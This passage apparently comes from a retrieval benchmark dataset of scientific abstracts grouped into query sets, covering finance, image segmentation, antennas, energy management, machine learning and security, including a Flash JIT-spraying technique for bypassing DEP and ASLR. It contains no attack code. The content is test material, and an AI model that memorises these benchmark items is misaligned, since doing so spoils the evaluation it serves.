Chris Veld, Boyce Watkins, Martin Weber and Stephan Wiehler, along with seminar participants from American Finance Association 2005 (Philadelphia), the Economic Science Association 2004 (Amsterdam), the Financial Management Association 2004 (New Orleans), the Financial Management Association European Meeting 2004 (Zurich), European Financial Management Association 2004 (Basle), the Northern Finance Association (St. John’s, Newfoundland), the 2004 Symposium for Experimental Finance at the Aston Centre for Experimental Finance (Aston Business School), the 2005 Federal Reserve Bank of Atlanta Experimental Finance Conference, the University of Köln, the University of Konstanz, McMaster University, the University of Tilburg, Wilfred Laurier University and York University. Valuable technical assistance was provided by Harald Lohre, Amer Mohamed and John O’Brien. Generous financial assistance from ZEW, Institut de Finance Mathématiques de Montréal and SSHRC is gratefully acknowledged. Any views expressed represent those of the authors only and not necessarily those of McKinsey & Company, Inc. C © The Authors 2008. Published by Oxford University Press on behalf of the European Finance Association. All rights reserved. For Permissions, please email: journals.permissions@oxfordjournals.org 556 RICHARD DEAVES, ERIK LÜDERS, AND GUO YING LUO",
"title": ""
},
{
"docid": "d2cf6c5241e2169c59cfbb39bf3d09bb",
"text": "As remote exploits further dwindle and perimeter defenses become the standard, remote client-side attacks are becoming the standard vector for attackers. Modern operating systems have quelled the explosion of client-side vulnerabilities using mitigation techniques such as data execution prevention (DEP) and address space layout randomization (ASLR). This work illustrates two novel techniques to bypass these mitigations. The two techniques leverage the attack surface exposed by the script interpreters commonly accessible within the browser. The first technique, pointer inference, is used to find the memory address of a string of shellcode within the Adobe Flash Player's ActionScript interpreter despite ASLR. The second technique, JIT spraying, is used to write shellcode to executable memory, bypassing DEP protections, by leveraging predictable behaviors of the ActionScript JIT compiler. Previous attacks are examined and future research directions are discussed.",
"title": ""
},
{
"docid": "96be7a58f4aec960e2ad2273dea26adb",
"text": "Because time series are a ubiquitous and increasingly prevalent type of data, there has been much research effort devoted to time series data mining recently. As with all data mining problems, the key to effective and scalable algorithms is choosing the right representation of the data. Many high level representations of time series have been proposed for data mining. In this work, we introduce a new technique based on a bit level approximation of the data. The representation has several important advantages over existing techniques. One unique advantage is that it allows raw data to be directly compared to the reduced representation, while still guaranteeing lower bounds to Euclidean distance. This fact can be exploited to produce faster exact algorithms for similarly search. In addition, we demonstrate that our new representation allows time series clustering to scale to much larger datasets.",
"title": ""
},
{
"docid": "b6a7cf463f7d9ac28526feaa205fad52",
"text": "In this work, we present a common framework for seeded image segmentation algorithms that yields two of the leading methods as special cases - The graph cuts and the random walker algorithms. The formulation of this common framework naturally suggests a new, third, algorithm that we develop here. Specifically, the former algorithms may be shown to minimize a certain energy with respect to either an l1 or an l2 norm. Here, we explore the segmentation algorithm defined by an linfin norm, provide a method for the optimization and show that the resulting algorithm produces an accurate segmentation that demonstrates greater stability with respect to the number of seeds employed than either the graph cuts or random walker methods.",
"title": ""
},
{
"docid": "8c0d3cfffb719f757f19bbb33412d8c6",
"text": "In this paper, we present a parallel Image-to-Mesh Conversion (I2M) algorithm with quality and fidelity guarantees achieved by dynamic point insertions and removals. Starting directly from an image, it is able to recover the isosurface and mesh the volume with tetrahedra of good shape. Our tightly-coupled shared-memory parallel speculative execution paradigm employs carefully designed contention managers, load balancing, synchronization and optimizations schemes which boost the parallel efficiency with little overhead: our single-threaded performance is faster than CGAL, the state of the art sequential mesh generation software we are aware of. The effectiveness of our method is shown on Blacklight, the Pittsburgh Supercomputing Center's cache-coherent NUMA machine, via a series of case studies justifying our choices. We observe a more than 82% strong scaling efficiency for up to 64 cores, and a more than 95% weak scaling efficiency for up to 144 cores, reaching a rate of 14.7 Million Elements per second. To the best of our knowledge, this is the fastest and most scalable 3D Delaunay refinement algorithm.",
"title": ""
},
{
"docid": "592a3f8b0d0781acd89c0102d1cd2a4e",
"text": "A novel, compact X-shaped slotted square-patch antenna is proposed for circularly polarized (CP) radiation. A cross-strip is embedded along the X-shaped slot for a novel proximity-fed technique to produce CP radiation in the UHF band. In the proposed design, two pairs of T-shaped slots are etched orthogonally on the square patch, connected to the center of the X-shaped slot for CP radiation and antenna size reduction. Proper adjustment of the length and coupling gap of the cross-strip will excite two orthogonal modes with 90 ° phase difference for good CP radiation. Simulated and measured results indicate that the proposed structure can achieve circular polarization. A measured impedance bandwidth (VSWR ≤ 2) of about 3.0% (909-937 MHz) and a 3-dB axial-ratio (AR) bandwidth of about 1.3% (917-929 MHz) were obtained.",
"title": ""
},
{
"docid": "70fafdedd05a40db5af1eabdf07d431c",
"text": "Segmentation of the left ventricle (LV) from cardiac magnetic resonance imaging (MRI) datasets is an essential step for calculation of clinical indices such as ventricular volume and ejection fraction. In this work, we employ deep learning algorithms combined with deformable models to develop and evaluate a fully automatic LV segmentation tool from short-axis cardiac MRI datasets. The method employs deep learning algorithms to learn the segmentation task from the ground true data. Convolutional networks are employed to automatically detect the LV chamber in MRI dataset. Stacked autoencoders are used to infer the LV shape. The inferred shape is incorporated into deformable models to improve the accuracy and robustness of the segmentation. We validated our method using 45 cardiac MR datasets from the MICCAI 2009 LV segmentation challenge and showed that it outperforms the state-of-the art methods. Excellent agreement with the ground truth was achieved. Validation metrics, percentage of good contours, Dice metric, average perpendicular distance and conformity, were computed as 96.69%, 0.94, 1.81 mm and 0.86, versus those of 79.2-95.62%, 0.87-0.9, 1.76-2.97 mm and 0.67-0.78, obtained by other methods, respectively.",
"title": ""
},
{
"docid": "1efeab8c3036ad5ec1b4dc63a857b392",
"text": "In this paper, we present a motion planning framework for a fully deployed autonomous unmanned aerial vehicle which integrates two sample-based motion planning techniques, Probabilistic Roadmaps and Rapidly Exploring Random Trees. Additionally, we incorporate dynamic reconfigurability into the framework by integrating the motion planners with the control kernel of the UAV in a novel manner with little modification to the original algorithms. The framework has been verified through simulation and in actual flight. Empirical results show that these techniques used with such a framework offer a surprisingly efficient method for dynamically reconfiguring a motion plan based on unforeseen contingencies which may arise during the execution of a plan. The framework is generic and can be used for additional platforms.",
"title": ""
},
{
"docid": "e88bac9a4023b1c741c720e034669109",
"text": "We present AffectAura, an emotional prosthetic that allows users to reflect on their emotional states over long periods of time. We designed a multimodal sensor set-up for continuous logging of audio, visual, physiological and contextual data, a classification scheme for predicting user affective state and an interface for user reflection. The system continuously predicts a user's valence, arousal and engage-ment, and correlates this with information on events, communications and data interactions. We evaluate the interface through a user study consisting of six users and over 240 hours of data, and demonstrate the utility of such a reflection tool. We show that users could reason forward and backward in time about their emotional experiences using the interface, and found this useful.",
"title": ""
},
{
"docid": "9f3e9e7c493b3b62c7ec257a00f43c20",
"text": "The wind stroke is a common syndrome in clinical disease; the physicians of past generations accumulated much experience in long-term clinical practice and left abundant literature. Looking from this literature, the physicians of past generations had different cognitions of the wind stroke, especially the concept of wind stroke. The connotation of wind stroke differed at different stages, going through a gradually changing process from exogenous disease, true wind stroke, apoplectic wind stroke to cerebral apoplexy.",
"title": ""
}
] | scidocsrr |
939722dcb0dd8180b64ca79ccce1e112 | Energy management systems: state of the art and emerging trends | [
{
"docid": "a8d6fe9d4670d1ccc4569aa322f665ee",
"text": "Abstract Improved feedback on electricity consumption may provide a tool for customers to better control their consumption and ultimately save energy. This paper asks which kind of feedback is most successful. For this purpose, a psychological model is presented that illustrates how and why feedback works. Relevant features of feedback are identified that may determine its effectiveness: frequency, duration, content, breakdown, medium and way of presentation, comparisons, and combination with other instruments. The paper continues with an analysis of international experience in order to find empirical evidence for which kinds of feedback work best. In spite of considerable data restraints and research gaps, there is some indication that the most successful feedback combines the following features: it is given frequently and over a long time, provides an appliance-specific breakdown, is presented in a clear and appealing way, and uses computerized and interactive tools.",
"title": ""
}
] | [
{
"docid": "1d4b1612f9e3d3205ced6ba07af21467",
"text": "A precision control system that enables a center pivot irrigation system (CP) to precisely supply water in optimal rates relative to the needs of individual areas within fields was developed through a collaboration between the Farmscan group (Perth, Western Australia) and the University of Georgia Precision Farming team at the National Environmentally Sound Production Agriculture Laboratory (NESPAL) in Tifton, GA. The control system, referred to as Variable-Rate Irrigation (VRI), varies application rate by cycling sprinklers on and off and by varying the CP travel speed. Desktop PC software is used to define application maps which are loaded into the VRI controller. The VRI system uses GPS to determine pivot position/angle of the CP mainline. Results from VRI system performance testing indicate good correlation between target and actual application rates and also shows that sprinkler cycling on/off does not alter the CP uniformity. By applying irrigation water in this precise manner, water application to the field is optimized. In many cases, substantial water savings can be realized.",
"title": ""
},
{
"docid": "22d153c01c82117466777842724bbaca",
"text": "State-of-the-art photovoltaics use high-purity, large-area, wafer-scale single-crystalline semiconductors grown by sophisticated, high-temperature crystal growth processes. We demonstrate a solution-based hot-casting technique to grow continuous, pinhole-free thin films of organometallic perovskites with millimeter-scale crystalline grains. We fabricated planar solar cells with efficiencies approaching 18%, with little cell-to-cell variability. The devices show hysteresis-free photovoltaic response, which had been a fundamental bottleneck for the stable operation of perovskite devices. Characterization and modeling attribute the improved performance to reduced bulk defects and improved charge carrier mobility in large-grain devices. We anticipate that this technique will lead the field toward synthesis of wafer-scale crystalline perovskites, necessary for the fabrication of high-efficiency solar cells, and will be applicable to several other material systems plagued by polydispersity, defects, and grain boundary recombination in solution-processed thin films.",
"title": ""
},
{
"docid": "287572e1c394ec6959853f62b7707233",
"text": "This paper presents a method for state estimation on a ballbot; i.e., a robot balancing on a single sphere. Within the framework of an extended Kalman filter and by utilizing a complete kinematic model of the robot, sensory information from different sources is combined and fused to obtain accurate estimates of the robot's attitude, velocity, and position. This information is to be used for state feedback control of the dynamically unstable system. Three incremental encoders (attached to the omniwheels that drive the ball of the robot) as well as three rate gyroscopes and accelerometers (attached to the robot's main body) are used as sensors. For the presented method, observability is proven analytically for all essential states in the system, and the algorithm is experimentally evaluated on the Ballbot Rezero.",
"title": ""
},
{
"docid": "38935c773fb3163a1841fcec62b3e15a",
"text": "We investigate how neural networks can learn and process languages with hierarchical, compositional semantics. To this end, we define the artificial task of processing nested arithmetic expressions, and study whether different types of neural networks can learn to compute their meaning. We find that recursive neural networks can implement a generalising solution to this problem, and we visualise this solution by breaking it up in three steps: project, sum and squash. As a next step, we investigate recurrent neural networks, and show that a gated recurrent unit, that processes its input incrementally, also performs very well on this task: the network learns to predict the outcome of the arithmetic expressions with high accuracy, although performance deteriorates somewhat with increasing length. To develop an understanding of what the recurrent network encodes, visualisation techniques alone do not suffice. Therefore, we develop an approach where we formulate and test multiple hypotheses on the information encoded and processed by the network. For each hypothesis, we derive predictions about features of the hidden state representations at each time step, and train ‘diagnostic classifiers’ to test those predictions. Our results indicate that the networks follow a strategy similar to our hypothesised ‘cumulative strategy’, which explains the high accuracy of the network on novel expressions, the generalisation to longer expressions than seen in training, and the mild deterioration with increasing length. This is turn shows that diagnostic classifiers can be a useful technique for opening up the black box of neural networks. We argue that diagnostic classification, unlike most visualisation techniques, does scale up from small networks in a toy domain, to larger and deeper recurrent networks dealing with real-life data, and may therefore contribute to a better understanding of the internal dynamics of current state-of-the-art models in natural language processing.",
"title": ""
},
{
"docid": "1d4b1015a319612ea802c9179c73c15e",
"text": "Nowadays, recommender systems provide essential web services on the Internet. There are mainly two categories of traditional recommendation algorithms: Content-Based (CB) and Collaborative Filtering (CF). CF methods make recommendations mainly according to the historical feedback information. They usually perform better when there is sufficient feedback information but less successful on new users and items, which is called the \"cold-start'' problem. However, CB methods help in this scenario because of using content information. To take both advantages of CF and CB, how to combine them is a challenging issue. To the best of our knowledge, little previous work has been done to solve the problem in one unified recommendation model. In this work, we study how to integrate CF and CB, which utilizes both types of information in model-level but not in result-level and makes recommendations adaptively. A novel attention-based model named Attentional Content&Collaborate Model (ACCM) is proposed. Attention mechanism helps adaptively adjust for each user-item pair from which source information the recommendation is made. Especially, a \"cold sampling'' learning strategy is designed to handle the cold-start problem. Experimental results on two benchmark datasets show that the ACCM performs better on both warm and cold tests compared to the state-of-the-art algorithms.",
"title": ""
},
{
"docid": "a0e1a6a7730b1a84121a02a96faacb31",
"text": "This paper describes a mostly automatic method for taking the output of a single panning video camera and creating a panoramic video texture (PVT): a video that has been stitched into a single, wide field of view and that appears to play continuously and indefinitely. The key problem in creating a PVT is that although only a portion of the scene has been imaged at any given time, the output must simultaneously portray motion throughout the scene. Like previous work in video textures, our method employs min-cut optimization to select fragments of video that can be stitched together both spatially and temporally. However, it differs from earlier work in that the optimization must take place over a much larger set of data. Thus, to create PVTs, we introduce a dynamic programming step, followed by a novel hierarchical min-cut optimization algorithm. We also use gradient-domain compositing to further smooth boundaries between video fragments. We demonstrate our results with an interactive viewer in which users can interactively pan and zoom on high-resolution PVTs.",
"title": ""
},
{
"docid": "b9efcefffc894501f7cfc42d854d6068",
"text": "Disruption of electric power operations can be catastrophic on the national security and economy. Due to the complexity of widely dispersed assets and the interdependency between computer, communication, and power systems, the requirement to meet security and quality compliance on the operations is a challenging issue. In recent years, NERC's cybersecurity standard was initiated to require utilities compliance on cybersecurity in control systems - NERC CIP 1200. This standard identifies several cyber-related vulnerabilities that exist in control systems and recommends several remedial actions (e.g., best practices). This paper is an overview of the cybersecurity issues for electric power control and automation systems, the control architectures, and the possible methodologies for vulnerability assessment of existing systems.",
"title": ""
},
{
"docid": "8a56dfbe83fbdd45d85c6b2ac793338b",
"text": "Idioms of distress communicate suffering via reference to shared ethnopsychologies, and better understanding of idioms of distress can contribute to effective clinical and public health communication. This systematic review is a qualitative synthesis of \"thinking too much\" idioms globally, to determine their applicability and variability across cultures. We searched eight databases and retained publications if they included empirical quantitative, qualitative, or mixed-methods research regarding a \"thinking too much\" idiom and were in English. In total, 138 publications from 1979 to 2014 met inclusion criteria. We examined the descriptive epidemiology, phenomenology, etiology, and course of \"thinking too much\" idioms and compared them to psychiatric constructs. \"Thinking too much\" idioms typically reference ruminative, intrusive, and anxious thoughts and result in a range of perceived complications, physical and mental illnesses, or even death. These idioms appear to have variable overlap with common psychiatric constructs, including depression, anxiety, and PTSD. However, \"thinking too much\" idioms reflect aspects of experience, distress, and social positioning not captured by psychiatric diagnoses and often show wide within-cultural variation, in addition to between-cultural differences. Taken together, these findings suggest that \"thinking too much\" should not be interpreted as a gloss for psychiatric disorder nor assumed to be a unitary symptom or syndrome within a culture. We suggest five key ways in which engagement with \"thinking too much\" idioms can improve global mental health research and interventions: it (1) incorporates a key idiom of distress into measurement and screening to improve validity of efforts at identifying those in need of services and tracking treatment outcomes; (2) facilitates exploration of ethnopsychology in order to bolster cultural appropriateness of interventions; (3) strengthens public health communication to encourage engagement in treatment; (4) reduces stigma by enhancing understanding, promoting treatment-seeking, and avoiding unintentionally contributing to stigmatization; and (5) identifies a key locally salient treatment target.",
"title": ""
},
{
"docid": "3b2c18828ef155233ede7f51d80f656a",
"text": "It is crucial for cancer diagnosis and treatment to accurately identify the site of origin of a tumor. With the emergence and rapid advancement of DNA microarray technologies, constructing gene expression profiles for different cancer types has already become a promising means for cancer classification. In addition to research on binary classification such as normal versus tumor samples, which attracts numerous efforts from a variety of disciplines, the discrimination of multiple tumor types is also important. Meanwhile, the selection of genes which are relevant to a certain cancer type not only improves the performance of the classifiers, but also provides molecular insights for treatment and drug development. Here, we use semisupervised ellipsoid ARTMAP (ssEAM) for multiclass cancer discrimination and particle swarm optimization for informative gene selection. ssEAM is a neural network architecture rooted in adaptive resonance theory and suitable for classification tasks. ssEAM features fast, stable, and finite learning and creates hyperellipsoidal clusters, inducing complex nonlinear decision boundaries. PSO is an evolutionary algorithm-based technique for global optimization. A discrete binary version of PSO is employed to indicate whether genes are chosen or not. The effectiveness of ssEAM/PSO for multiclass cancer diagnosis is demonstrated by testing it on three publicly available multiple-class cancer data sets. ssEAM/PSO achieves competitive performance on all these data sets, with results comparable to or better than those obtained by other classifiers",
"title": ""
},
{
"docid": "03e48fbf57782a713bd218377290044c",
"text": "Several researchers have shown that the efficiency of value iteration, a dynamic programming algorithm for Markov decision processes, can be improved by prioritizing the order of Bellman backups to focus computation on states where the value function can be improved the most. In previous work, a priority queue has been used to order backups. Although this incurs overhead for maintaining the priority queue, previous work has argued that the overhead is usually much less than the benefit from prioritization. However this conclusion is usually based on a comparison to a non-prioritized approach that performs Bellman backups on states in an arbitrary order. In this paper, we show that the overhead for maintaining the priority queue can be greater than the benefit, when it is compared to very simple heuristics for prioritizing backups that do not require a priority queue. Although the order of backups induced by our simple approach is often sub-optimal, we show that its smaller overhead allows it to converge faster than other state-of-the-art priority-based solvers.",
"title": ""
},
{
"docid": "2354b0d44c4ce75bee5f91c7bbbe91b0",
"text": "The central role of phosphoinositide 3-kinase (PI3K) activation in tumour cell biology has prompted a sizeable effort to target PI3K and/or downstream kinases such as AKT and mammalian target of rapamycin (mTOR) in cancer. However, emerging clinical data show limited single-agent activity of inhibitors targeting PI3K, AKT or mTOR at tolerated doses. One exception is the response to PI3Kδ inhibitors in chronic lymphocytic leukaemia, where a combination of cell-intrinsic and -extrinsic activities drive efficacy. Here, we review key challenges and opportunities for the clinical development of inhibitors targeting the PI3K–AKT–mTOR pathway. Through a greater focus on patient selection, increased understanding of immune modulation and strategic application of rational combinations, it should be possible to realize the potential of this promising class of targeted anticancer agents.",
"title": ""
},
{
"docid": "4a9ad387ad16727d9ac15ac667d2b1c3",
"text": "In recent years face recognition has received substantial attention from both research communities and the market, but still remained very challenging in real applications. A lot of face recognition algorithms, along with their modifications, have been developed during the past decades. A number of typical algorithms are presented, being categorized into appearancebased and model-based schemes. For appearance-based methods, three linear subspace analysis schemes are presented, and several non-linear manifold analysis approaches for face recognition are briefly described. The model-based approaches are introduced, including Elastic Bunch Graph matching, Active Appearance Model and 3D Morphable Model methods. A number of face databases available in the public domain and several published performance evaluation results are digested. Future research directions based on the current recognition results are pointed out.",
"title": ""
},
{
"docid": "54d08c824b7c7cbb426102b40748eccb",
"text": "Within the broad field of spoken dialogue systems, the application of machine-learning approaches to dialogue management strategy design is a rapidly growing research area. The main motivation is the hope of building systems that learn through trial-and-error interaction what constitutes a good dialogue strategy. Training of such systems could in theory be done using human users or using corpora of humancomputer dialogue, but in practice the typically vast space of possible dialogue states and strategies cannot be explored without the use of automatic user simulation tools. This requirement for training statistical dialogue models has created an interesting new application area for predictive statistical user modelling and a variety of different techniques for simulating user behaviour have been presented in the literature ranging from simple Markov Models to Bayesian Networks. The development of reliable user simulation tools is critical to further progress on automatic dialogue management design but it holds many challenges, some of which have been encountered in other areas of current research on statistical user modelling, such as the problem of “concept drift”, the problem of combining content-based and collaboration-based modelling techniques, and user model evaluation. The latter topic is of particular interest, because simulation-based learning is currently one of the few applications of statistical user modelling which employs both direct “accuracy-based” and indirect “utility-based” evaluation techniques. In this paper, we briefly summarize the role of the dialogue manager in a spoken dialogue system, give a short introduction to reinforcement-learning of dialogue management strategies and review the literature on user modelling for simulation-based strategy learning. We further describe recent work on user model evaluation and discuss some of the current research issues in simulation-based learning from a user modelling perspective. 2 J. SCHATZMANN ET AL.",
"title": ""
},
{
"docid": "8c50cf2696d6bacd5efad62a33c0514f",
"text": "Nowadays several papers have shown the ability to dump the EEPROM area of several Java Cards leading to the disclosure of already loaded applet and data structure of the card. Such a reverse engineering process is costly and prone to errors. Currently there are no tools available to help the process. We propose here an approach to find in the raw data obtained after a dump, the area containing the code and the data. Then, once the code area has been identified, we propose to rebuilt the original binary Cap file in order to be able to obtain the source code of the applet stored in the card.",
"title": ""
},
{
"docid": "c658e818d5f13ff939211d67bde4fc18",
"text": "High-throughput studies of biological systems are rapidly accumulating a wealth of 'omics'-scale data. Visualization is a key aspect of both the analysis and understanding of these data, and users now have many visualization methods and tools to choose from. The challenge is to create clear, meaningful and integrated visualizations that give biological insight, without being overwhelmed by the intrinsic complexity of the data. In this review, we discuss how visualization tools are being used to help interpret protein interaction, gene expression and metabolic profile data, and we highlight emerging new directions.",
"title": ""
},
{
"docid": "c4d16a752ccb6cd11989593604887960",
"text": "Normalizing flows and autoregressive models have been successfully combined to produce state-of-the-art results in density estimation, via Masked Autoregressive Flows (MAF) (Papamakarios et al., 2017), and to accelerate stateof-the-art WaveNet-based speech synthesis to 20x faster than real-time (Oord et al., 2017), via Inverse Autoregressive Flows (IAF) (Kingma et al., 2016). We unify and generalize these approaches, replacing the (conditionally) affine univariate transformations of MAF/IAF with a more general class of invertible univariate transformations expressed as monotonic neural networks. We demonstrate that the proposed neural autoregressive flows (NAF) are universal approximators for continuous probability distributions, and their greater expressivity allows them to better capture multimodal target distributions. Experimentally, NAF yields state-of-the-art performance on a suite of density estimation tasks and outperforms IAF in variational autoencoders trained on binarized MNIST. 1",
"title": ""
},
{
"docid": "ba8ae795796d9d5c1d33d4e5ce692a13",
"text": "This work presents a type of capacitive sensor for intraocular pressure (IOP) measurement on soft contact lens with Radio Frequency Identification (RFID) module. The flexible capacitive IOP sensor and Rx antenna was designed and fabricated using MEMS fabrication technologies that can be embedded on a soft contact lens. The IOP sensing unit is a sandwich structure composed of parylene C as the substrate and the insulating layer, gold as the top and bottom electrodes of the capacitor, and Hydroxyethylmethacrylate (HEMA) as dielectric material between top plate and bottom plate. The main sensing principle is using wireless IOP contact lenses sensor (CLS) system placed on corneal to detect the corneal deformation caused due to the variations of IOP. The variations of intraocular pressure will be transformed into capacitance change and this change will be transmitted to RFID system and recorded as continuous IOP monitoring. The measurement on in-vitro porcine eyes show the pressure reproducibility and a sensitivity of 0.02 pF/4.5 mmHg.",
"title": ""
},
{
"docid": "e9a46aa0c797520a9b192fc5607b3521",
"text": "A common setting for novelty detection assumes that labeled xamples from the nominal class are available, but that labeled examples of novelties are un available. The standard (inductive) approach is to declare novelties where the nominal density is l ow, which reduces the problem to density level set estimation. In this paper, we consider the setting where an unlabeled and possibly contaminated sample is also available at learning tim e. We argue that novelty detection in this semi-supervised setting is naturally solved by a gener al r duction to a binary classification problem. In particular, a detector with a desired false posi tive rate can be achieved through a reduction to Neyman-Pearson classification. Unlike the induc tive approach, semi-supervised novelty detection (SSND) yields detectors that are optimal (e.g., s tatistically consistent) regardless of the distribution on novelties. Therefore, in novelty detectio n, unlabeled data have a substantial impact on the theoretical properties of the decision rule. We valid ate the practical utility of SSND with an extensive experimental study. We also show that SSND provides distribution-free, learnin g-theoretic solutions to two well known problems in hypothesis testing. First, our results pr ovide a general solution to the general two-sample problem, that is, the problem of determining whe ther two random samples arise from the same distribution. Second, a specialization of SSND coi ncides with the standard p-value approach to multiple testing under the so-called random effec ts model. Unlike standard rejection regions based on thresholded p-values, the general SSND framework allows for adaptation t o arbitrary alternative distributions in multiple dimensions.",
"title": ""
},
{
"docid": "da19fd683e64b0192bd52eadfade33a2",
"text": "For professional users such as firefighters and other first responders, GNSS positioning technology (GPS, assisted GPS) can satisfy outdoor positioning requirements in many instances. However, there is still a need for high-performance deep indoor positioning for use by these same professional users. This need has already been clearly expressed by various communities of end users in the context of WearIT@Work, an R&D project funded by the European Community's Sixth Framework Program. It is known that map matching can help for indoor pedestrian navigation. In most previous research, it was assumed that detailed building plans are available. However, in many emergency / rescue scenarios, only very limited building plan information may be at hand. For example a building outline might be obtained from aerial photographs or cataster databases. Alternatively, an escape plan posted at the entrances to many building would yield only approximate exit door and stairwell locations as well as hallway and room orientation. What is not known is how much map information is really required for a USAR mission and how much each level of map detail might help to improve positioning accuracy. Obviously, the geometry of the building and the course through will be factors consider. The purpose of this paper is to show how a previously published Backtracking Particle Filter (BPF) can be combined with different levels of building plan detail to improve PDR performance. A new in/out scenario that might be typical of a reconnaissance mission during a fire in a two-story office building was evaluated. Using only external wall information, the new scenario yields positioning performance (2.56 m mean 2D error) that is greatly superior to the PDR-only, no map base case (7.74 m mean 2D error). This result has a substantial practical significance since this level of building plan detail could be quickly and easily generated in many emergency instances. The technique could be used to mitigate heading errors that result from exposing the IMU to extreme operating conditions. It is hoped that this mitigating effect will also occur for more irregular paths and in larger traversed spaces such as parking garages and warehouses.",
"title": ""
},
{
"docid": "a22ebcf11189744e7e4f15d82b1fa9d2",
"text": "Several mathematical models of epidemic cholera have recently been proposed in response to outbreaks in Zimbabwe and Haiti. These models aim to estimate the dynamics of cholera transmission and the impact of possible interventions, with a goal of providing guidance to policy makers in deciding among alternative courses of action, including vaccination, provision of clean water, and antibiotics. Here, we discuss concerns about model misspecification, parameter uncertainty, and spatial heterogeneity intrinsic to models for cholera. We argue for caution in interpreting quantitative predictions, particularly predictions of the effectiveness of interventions. We specify sensitivity analyses that would be necessary to improve confidence in model-based quantitative prediction, and suggest types of monitoring in future epidemic settings that would improve analysis and prediction.",
"title": ""
}
] | scidocsrr |
8a74a65bd68963ffff054e04748fdee2 | A Framework for Ontology Evolution in Collaborative Environments | [
{
"docid": "e72f3c598623b6d226c0aca982aecd7d",
"text": "Researchers in the ontology-design field have developed the content for ontologies in many domain areas. This distributed nature of ontology development has led to a large number of ontologies covering overlapping domains. In order for these ontologies to be reused, they first need to be merged or aligned to one another. We developed a suite of tools for managing multiple ontologies. These suite provides users with a uniform framework for comparing, aligning, and merging ontologies, maintaining versions, translating between different formalisms. Two of the tools in the suite support semi-automatic ontology merging: iPrompt is an interactive ontologymerging tool that guides the user through the merging process, presenting him with suggestions for next steps and identifying inconsistencies and potential problems. AnchorPrompt uses a graph structure of ontologies to find correlation between concepts and to provide additional information for iPrompt. 1 1 Managing Multiple Ontologies Researchers have pursued development of ontologies—explicit formal specifications of domains of discourse—on the premise that ontologies facilitate knowledge sharing and reuse (Musen, 1992; Gruber, 1993). Today, ontology development is moving from academic knowledge-representation projects to the world of e-commerce. Companies use ontologies to share information and to guide customers through their Web sites. Ontologies on the World-Wide Web range from large taxonomies categorizing Web sites (such as Yahoo!) to categorizations of products for sale and their features (such as Amazon.com). In an effort to enable machine-interpretable representation of knowledge on the Web, the WWW Consortium has developed the Resource Description Framework (W3C, 2000), a language for encoding semantic information on Web pages. The WWW consortium is also working on OWL, a more high-level language for semantic annotation on the Web.1 Such encoding makes it possible for electronic agents searching for information to share the common understanding of the semantics of the data represented on the Web. Many disciplines now develop standardized ontologies that domain experts can use to share and annotate information in their fields. Medicine, for example, has produced large, standardized, structured vocabularies such as SNOMED (Spackman, 2000) and the semantic network of the Unified Medical Language System (Lindberg et al., 1993). Broad general-purpose ontologies are emerging as well. For example, the United Nations Development Program and Dun & Bradstreet combined their efforts to develop the UNSPSC ontology which provides terminology for products and services (www.unspsc.org). With this widespread distributed use of ontologies, different parties inevitably develop ontologies http://www.w3.org/2001/sw/WebOnt/",
"title": ""
}
] | [
{
"docid": "1349c5daedd71bdfccaa0ea48b3fd54a",
"text": "OBJECTIVE\nCraniosacral therapy (CST) is an alternative treatment approach, aiming to release restrictions around the spinal cord and brain and subsequently restore body function. A previously conducted systematic review did not obtain valid scientific evidence that CST was beneficial to patients. The aim of this review was to identify and critically evaluate the available literature regarding CST and to determine the clinical benefit of CST in the treatment of patients with a variety of clinical conditions.\n\n\nMETHODS\nComputerised literature searches were performed in Embase/Medline, Medline(®) In-Process, The Cochrane library, CINAHL, and AMED from database start to April 2011. Studies were identified according to pre-defined eligibility criteria. This included studies describing observational or randomised controlled trials (RCTs) in which CST as the only treatment method was used, and studies published in the English language. The methodological quality of the trials was assessed using the Downs and Black checklist.\n\n\nRESULTS\nOnly seven studies met the inclusion criteria, of which three studies were RCTs and four were of observational study design. Positive clinical outcomes were reported for pain reduction and improvement in general well-being of patients. Methodological Downs and Black quality scores ranged from 2 to 22 points out of a theoretical maximum of 27 points, with RCTs showing the highest overall scores.\n\n\nCONCLUSION\nThis review revealed the paucity of CST research in patients with different clinical pathologies. CST assessment is feasible in RCTs and has the potential of providing valuable outcomes to further support clinical decision making. However, due to the current moderate methodological quality of the included studies, further research is needed.",
"title": ""
},
{
"docid": "1114300ff9cab6dc29e80c4d22e45e1e",
"text": "Single- and dual-feed, dual-frequency, low-profile antennas with independent tuning using varactor diodes have been demonstrated. The dual-feed planar inverted F-antenna (PIFA) has two operating frequencies which can be independently tuned from 0.7 to 1.1 GHz and from 1.7 to 2.3 GHz with better than -10 dB impedance match. The isolation between the high-band and the low-band ports is >13 dB; hence, one resonant frequency can be tuned without affecting the other. The single-feed antenna has two resonant frequencies, which can be independently tuned from 1.2 to 1.6 GHz and from 1.6 to 2.3 GHz with better than -10 dB impedance match for most of the tuning range. The tuning is done using varactor diodes with a capacitance range from 0.8 to 3.8 pF, which is compatible with RF MEMS devices. The antenna volumes are 63 × 100 × 3.15 mm3 on er = 3.55 substrates and the measured antenna efficiencies vary between 25% and 50% over the tuning range. The application areas are in carrier aggregation systems for fourth generation (4G) wireless systems.",
"title": ""
},
{
"docid": "8b11c5c6b134576d8ce7ce3484e17822",
"text": "The popularity and complexity of online social networks (OSNs) continues to grow unabatedly with the most popular applications featuring hundreds of millions of active users. Ranging from social communities and discussion groups, to recommendation engines, tagging systems, mobile social networks, games, and virtual worlds, OSN applications have not only shifted the focus of application developers to the human factor, but have also transformed traditional application paradigms such as the way users communicate and navigate in the Internet. Indeed, understanding user behavior is now an integral part of online services and applications, with system and algorithm design becoming in effect user-centric. As expected, this paradigm shift has not left the research community unaffected, triggering intense research interest in the analysis of the structure and properties of online communities.",
"title": ""
},
{
"docid": "e6a60fab31af5985520cc64b93b5deb0",
